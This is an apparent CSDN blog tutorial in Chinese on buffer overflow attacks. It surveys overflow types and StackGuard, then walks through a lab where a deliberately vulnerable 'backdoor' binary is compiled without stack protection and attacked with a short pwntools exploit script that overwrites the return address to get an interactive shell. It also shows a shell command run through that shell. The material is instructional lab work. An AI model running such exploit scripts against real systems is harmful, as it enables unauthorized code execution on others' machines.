缓冲区溢出之攻击

于 2020-11-24 07:06:46 发布
阅读量1.3k 收藏 7
点赞数 1
分类专栏: 安全测试:web\app\工具 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43650289/article/details/110005655
版权

目录

描述

类别

拓扑图

准备环境

过程

分析

描述

 缓冲区溢出攻击是利用缓冲区溢出漏洞所进行的攻击行动。缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统关机、重新启动等后果。

缓冲区溢出(Buffer Overflow)是计算机安全领域内既经典而又古老的话题。随着计算机系统安全性的加强,传统的缓冲区溢出攻击方式可能变得不再奏效,相应的介绍缓冲区溢出原理的资料也变得“大众化”起来。其中看雪的《0day安全:软件漏洞分析技术》一书将缓冲区溢出攻击的原理阐述得简洁明了。结合实际的代码实例进行验证。不过即便如此,完成一个简单的溢出代码也需要解决很多书中无法涉及的问题,尤其是面对较新的具有安全特性的编译器——比如MS的Visual Studio2010。接下来,我们结合具体代码,按照对缓冲区溢出原理的循序渐进地理解方式去挖掘缓冲区溢出背后的底层机制。

类别

缓冲区溢出的攻击大致分为以下几类:栈溢出(stack smashing)未检查输入缓冲区长度,导致数组越界,覆盖栈中局部变量空间之上的栈桢指针%ebp以及函数返回地址retaddr。

堆溢出(malloc/free heapcorruption):一种是和传统的栈溢出一样, 当输入超出malloc()预先分配的空间大小,就会覆盖掉这段空间之后的一段存储区域,如果该存储区域有一个重要的变量比如euid。

格式化字符窜漏洞(format stringvulnerability):如果格式窜由用户定制,攻击者就可以任意伪造格式窜,利用*printf()系列函数的特性就可以窥探堆栈空间的内容,超常输入可以引发传统的缓冲区溢出,或是用”%n”覆盖指针、返回地址等。

整形变量溢出(integer variableoverflow):利用整数的范围、符号等问题触发安全漏洞,大多数整形溢出不能直接利用,但如果该整形变量决定内存分配等操作,我们就有可能间接利用该漏洞。

其他的攻击手法(others):只能算是手法,不能算是一种单独的类别。利用ELF文件格式的特性如:覆盖.plt(过程连接表)、.dtor(析构函数指针)、.got(全局偏移表)、return-to-libc(返回库函数)等的方式进行攻击。

Stackguard:因为缓冲区溢出的通常都会改写函数返回地址,stackguard是个编译器补丁,它产生一个"canary"值(一个单字)放到返回地址的前面,如果 当函数返回时,发现这个canary的值被改变了,就证明可能有人正在试图进行缓冲区溢出攻击,程序会立刻响应,发送一条入侵警告消息给syslogd, 然后终止进程。

拓扑图

准备环境

靶机部署缓冲区的环境:程序绑定在 12345 端口

编译

gcc backdoor.c -o backdoor -fno-stack-protector

运行

$ ./backdoor

攻击机安装依赖环境:使用 python3 环境

安装pwntools

$ pip install pwntools -i https://pypi.tuna.tsinghua.edu.cn/simple/

过程

1.在攻击机器上编写exp.py脚本

from pwn import *
# cn=process('./backdoor')
cn=remote('192.168.220.241',12345) # 靶机部署的地址
cn.sendline(p64(0)*3+p64(0x400770))
cn.interactive()

 

运行脚本

python3 exp.py

未安装依赖包 

安装依赖包过程

python3 -m pip install pwntools -i https://pypi.tuna.tsinghua.edu.cn/simple/

apt-get install -y python3-dev python3-pip libffi-dev libssl-dev


$ pip install pipenv
$ pipenv shell
> pip install pwntools -i https://pypi.tuna.tsinghua.edu.cn/simple/

发现使用上述方法不管用

进行更新包安装

apt-get update

下载包

git clone https://github.com/Gallopsled/pwntools 

继续安装

结果

或者

更改反弹的内容

“/bin/sh -c ifconfig > /tmp/ev.txt"

最后在水滴上查看结果;

分析

查看靶机源码中定义了端口,函数,反弹的一句话

这里定义客户端,字符串

当循环到一定程度上,超出了所能存储的范围,就会形成溢出

同时也做了监听

参考脚本地址:https://pypi.org/project/pwntools/

战神/calmness
关注
专栏目录
缓冲区溢出
01-08
包含完成的视屏教程和共享代码、测试环境,经测试可以运行。
缓冲区溢出攻击
Eastbrook_Liu的博客
01-22 1826
缓冲区溢出(Buffer Overflow)是计算机安全领域内既经典而又古老的话题。随着计算机系统安全性的加强,传统的缓冲区溢出攻击方式可能变得不再奏效,相应的介绍缓冲区溢出原理的资料也变得“大众化”起来。
缓冲区溢出的两种方式
weixin_34179968的博客
07-19 196
两种覆盖方式:①用任意字符覆盖缓冲区和ebp,eip覆盖成“jmp esp”的地址,而后跟shellcode,这中方式适合于比较小的缓冲区和shellcode, 过长的shellcode将失败。②缓冲区和ebp由若干个“NOP”指令+shellcode+任意字符覆盖,eip指向缓冲区的某个NOP指令的所在位置。这适合与比较大的缓冲 区和shellcode,但shellcode的大小不能大于缓冲区的...
缓冲区溢出漏洞实验报告(附带程序源码和被攻击程序)
04-18
3.缓冲区溢出演示 4.溢出攻击结果与危害 5.防御手段 适合人群: 具备一定编程基础,作业时间不够的学生,对缓冲区溢出原理不了解的初学者 环境: IDA pro7.6, vc++ ,x32dbg。 阅读建议: 有一点 x32dbg逆向工具...
计算机系统基础之缓冲区溢出攻击实验
04-14
《计算机系统基础之缓冲区溢出攻击实验》是一份详细介绍了如何进行缓冲区溢出攻击的教学实验报告。 #### 实验目的 - **加深理解**:加深学生对IA-32架构下的函数调用机制和栈帧结构的理解。 - **攻击实践**:通过...
第三章 缓冲区溢出攻击
05-02
缓冲区溢出攻击可以分为基于BSS 段的缓冲区溢出攻击、基于修改邻接变量的栈缓冲区溢出攻击和基于堆的缓冲区溢出攻击等。 基于BSS 段的缓冲区溢出攻击是指在BSS 段中溢出缓冲区,从而实现恶意代码的执行。这种攻击...
缓冲区溢出攻击原理+实例讲解
最新发布
01-05
"缓冲区溢出攻击原理+实例讲解" 缓冲区溢出攻击是一种常见的安全漏洞,发生在缓冲区向内存写入数据时。当缓冲区的容量不足以容纳所有数据时,多余的数据将溢出到相邻的内存区域,可能覆盖掉该区域的数据,从而导致...
缓冲区溢出攻击研究.pdf
10-29
缓冲区溢出攻击研究 缓冲区溢出攻击是一种常见的网络攻击技术,它可以使攻击者获得未授权的访问权限、控制程序的执行流程、盗取敏感数据等。缓冲区溢出攻击的原理是攻击者向缓冲区中写入超过缓冲区最大容量的数据,...
缓冲区溢出教程
07-28
书中很细致的讲解了缓冲区溢出的知识,溢出原理、溢出点定位、常见的溢出方式等这些最基本的知识,希望大家喜欢。
理解缓冲区溢出攻击与防范
- **影响**:缓冲区溢出攻击可能导致程序崩溃,数据丢失,更严重的是,它可能被用来获取系统控制权,执行任意命令,破坏系统安全性。 3. **缓冲区溢出攻击举例** - **示例代码**:以下是一个简单的例子,程序试图...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值